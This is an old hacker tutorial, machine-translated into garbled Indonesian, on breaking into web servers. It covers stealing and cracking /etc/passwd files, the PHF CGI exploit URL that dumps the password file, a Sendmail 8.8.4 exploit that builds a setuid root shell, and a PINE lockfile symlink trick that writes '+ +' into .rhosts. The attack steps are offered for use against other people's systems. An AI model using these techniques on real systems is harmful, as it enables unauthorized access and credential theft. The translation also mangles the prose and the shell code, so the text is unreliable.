Hacking Webpage - The Ultimate panduan

Pengarang: Virtual Circuit dan Psychotic

Well Psychotic menulis salah satu yang paling bermanfaat unix file teks di dunia maya tetapi dengan mail yang kita diterima setelah rilis halaman 36 kami yang terkenal Unix Alkitab kita menyadari bahwa unix ini bukan untuk semua orang begitu kami memutuskan bahwa kita harus menulis pada aspek lain dari hacking ..... Virtual Circuit dan bangga Psychotic release, "Hacking Halaman Web Dengan beberapa Teknik lain." Kita akan membahas beberapa berbagai cara hacking halaman Web dan mendapatkan akar. Kami juga akan mewawancarai dan pertanyaan REAL hacker lainnya di pelajaran. Mendapatkan Password Melalui FTP File Ok juga salah satu cara termudah mendapatkan akses superuser adalah melalui anonymous ftp akses ke web. Pertama anda perlu belajar sedikit tentang file password ... root: User: d7Bdg: 1n2HG2: 1127:20: Superuser TomJones: p5Y (h0tiC: 1229:20: Tom Jones,: / usr / orang / tomjones: / bin / csh BBob: EUyd5XAAtv2dA: 1129:20: Billy Bob: / usr / orang / bbob: / bin / csh Ini merupakan contoh password file yang terenkripsi. The Superuser adalah bagian yang memberikan anda root. Itulah bagian utama dari file. root: x: 0:1: Superuser: /: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin: x: 203:102: ftp Administrator: / u1/ftp Ini adalah contoh lain dari file password, hanya yang satu ini memiliki satu perbedaan kecil, itu gelap. Shadowed file password tidak membiarkan Anda melihat atau menyalin kata sandi terenkripsi yang sebenarnya. Hal ini menyebabkan masalah untuk memasukkan sandi pembuat kerupuk dan kamus (keduanya dijelaskan nanti dalam teks). Di bawah ini adalah lain contoh file password gelap: root: x :0:1:0000-Admin (0000 ):/:/ usr / bin / csh daemon: x :1:1:0000-Admin (0000): /: bin: x :2:2:0000-Admin (0000): / usr / bin:

sys: x :3:3:0000-Admin (0000): /: adm: x :4:4:0000-Admin (0000): / var / adm: lp: x :71:8:0000-lp (0000): / usr / spool / lp: smtp: x: 0:0: mail daemon user: /: uucp: x :5:5:0000-uucp (0000): / usr / lib / uucp: nuucp: x :9:9:0000-uucp (0000): / var / spool / uucppublic: / usr / lib / uucp / uucico mendengarkan: x: 37:4: Network Admin: / usr / net / nls: nobody: x: 60001:60001: uid no body: /: noaccess: x: 60002:60002: uid no access: /: webmastr: x: 53:53: WWW Admin: / export / home / webmastr: / usr / bin / csh pin4geo: x: 55:55: PinPaper Admin: / export/home/webmastr/new/gregY/test/pin4geo: / bin / false ftp:x:54:54:Anonymous FTP: / export / home / anon_ftp: / bin / false

Shadowed password file memiliki "x" di tempat password atau kadang-kadang mereka menyamar sebagai * Juga. Sekarang Anda tahu sedikit lebih banyak tentang apa yang sebenarnya file password Sepertinya Anda harus dapat mengidentifikasi dienkripsi normal pw dari file pw gelap. Kita sekarang dapat melanjutkan untuk berbicara tentang bagaimana untuk memecahkannya. Cracking file password tidak serumit itu akan tampak, walaupun file sistem bervariasi dari sistem. 1.The langkah pertama yang akan Anda ambil adalah untuk men-download atau menyalin file. 2. Langkah kedua adalah untuk menemukan password cracker dan dictionary maker. Meskipun hampir tidak mungkin untuk menemukan kerupuk yang baik di sana adalah beberapa yang ok di luar sana. Saya sarankan Anda mencari Cracker Jack, John the Ripper, Brute Force Cracker, atau Jack the Ripper. Sekarang untuk dictionary maker atau dictionary file ... Ketika Anda mulai retak prog Anda akan diminta untuk mencari file password. Itu tempat pembuat kamus masuk Anda dapat

download salah satu dari hampir setiap halaman hacker di net. Seorang pembuat kamus menemukan semua surat yang mungkin kombinasi dengan alfabet yang Anda pilih (ASCII, topi, huruf kecil, dan angka surat juga mungkin ditambahkan). Kami akan merilis pasword kita file ke publik segera, itu akan disebut, Psychotic Candy, "The Perfect Drug. "Sejauh yang kami tahu itu akan menjadi salah satu yang terbesar di sirkulasi. 3. Anda kemudian mulai mendaki kerupuk dan ikuti petunjuk yang memberikan anda. The PHF Teknik Yah aku tidak yakin apakah aku harus menyertakan bagian ini karena fakta bahwa semua orang sudah tahu itu dan kebanyakan server sudah mengetahui tentang bug dan fixed it. Tapi karena saya telah mengajukan pertanyaan tentang PHF saya memutuskan untuk memasukkannya. The PHF Teknik sejauh ini merupakan cara termudah untuk mendapatkan file password (meskipun tidak bekerja 95% dari waktu). Tetapi untuk melakukan PHF semua yang Anda lakukan adalah membuka browser dan ketik link berikut ini:

http://webpage_goes_here/cgi-bin/phf?Qalias=x% 0a/bin/cat% 20/etc/passwd Anda mengganti webpage_goes_here dengan domain. Jadi, jika Anda mencoba untuk mendapatkan file pw www.webpage.com anda sekarang perlu mengetikkan: http://www.webpage.com/cgi-bin/phf?Qalias=x% 0a/bin/cat% 20/etc/passwd dan hanya itu! Anda hanya duduk dan salin file (jika bekerja). Telnet dan Exploits Yah memanfaatkan adalah cara terbaik untuk halaman web hacking, tetapi mereka juga lebih rumit kemudian hacking melalui ftp atau menggunakan PHF. Sebelum Anda dapat setup suatu mengeksploitasi Anda harus terlebih dahulu memiliki proggie telnet, ada

banyak klien yang berbeda Anda dapat saja melakukan netsearch dan menemukan semua yang anda butuhkan. Itu terbaik untuk mendapatkan account dengan target Anda (jika mungkin) dan melihat Glitches dari dalam ke luar. Exploits mengekspos kesalahan atau bug dalam sistem dan biasanya memungkinkan Anda untuk mendapatkan akses root. Ada banyak eksploitasi sekitar dan Anda dapat melihat masing-masing secara terpisah. Aku akan daftar beberapa di bawah ini tapi daftar eksploitasi adalah habisnya. Mengeksploitasi ini dikenal sebagai Sendmail v.8.8.4 Ini menciptakan program SUID / tmp / x yang memanggil shell sebagai root. Ini adalah bagaimana anda mengaturnya: cat <<_EOF_> / tmp / x.c # define RUN "/ bin / ksh" # include main () ( execl (RUN, RUN, NULL); ) _EOF_ # cat <<_EOF_> / tmp / spawnfish.c main () ( execl ( "/ usr / lib / sendmail", "/ tmp / smtpd", 0); ) _EOF_ # cat <<_EOF_> / tmp / smtpd.c

main () ( setuid (0); setgid (0); system ( "chown root / tmp / x; chmod 4755 / tmp / x"); ) _EOF_ # # gcc-O-o / tmp / x / tmp / x.c gcc-O3-o / tmp / spawnfish / tmp / spawnfish.c gcc-O3-o / tmp / smtpd / tmp / smtpd.c # / tmp / spawnfish membunuh-HUP `/ usr / UCB / ps-ax | grep / tmp / smtpd | grep-v grep | sed s /" []*"// | cut-d ""-f1 ` rm / tmp / spawnfish.c / tmp / spawnfish / tmp / smtpd.c / tmp / smtpd / tmp / xc sleep 5 if [-u / tmp / x]; kemudian echo "Leet ..." / tmp / x fi dan sekarang pada mengeksploitasi lain. Aku akan menampilkan mengeksploitasi pinus melalui linux. Dengan mengamati tabel proses dengan ps untuk melihat mana pengguna sedang menjalankan PINUS, seseorang dapat melakukan ls di / tmp / untuk mengumpulkan Lockfile nama-nama bagi setiap pengguna. Melihat tabel sekali lagi proses sekarang akan mengungkapkan ketika setiap pengguna berhenti PINE atau kehabisan pesan yang belum dibaca dalam INBOX, secara efektif menghapus Lockfile masingmasing.

Menciptakan symlink dari / tmp / .hamors_lockfile ke ~ hamors / .rhosts (untuk contoh umum) akan menyebabkan PINE membuat ~ hamors / .rhosts sebagai file 666 dengan PINE proses id itu sebagai isinya. Satu mungkin sekarang hanya melakukan echo "+ +"> / tmp / .hamors_lockfile, lalu rm / tmp / .hamors_lockfile.

Sign up to vote on this title
UsefulNot useful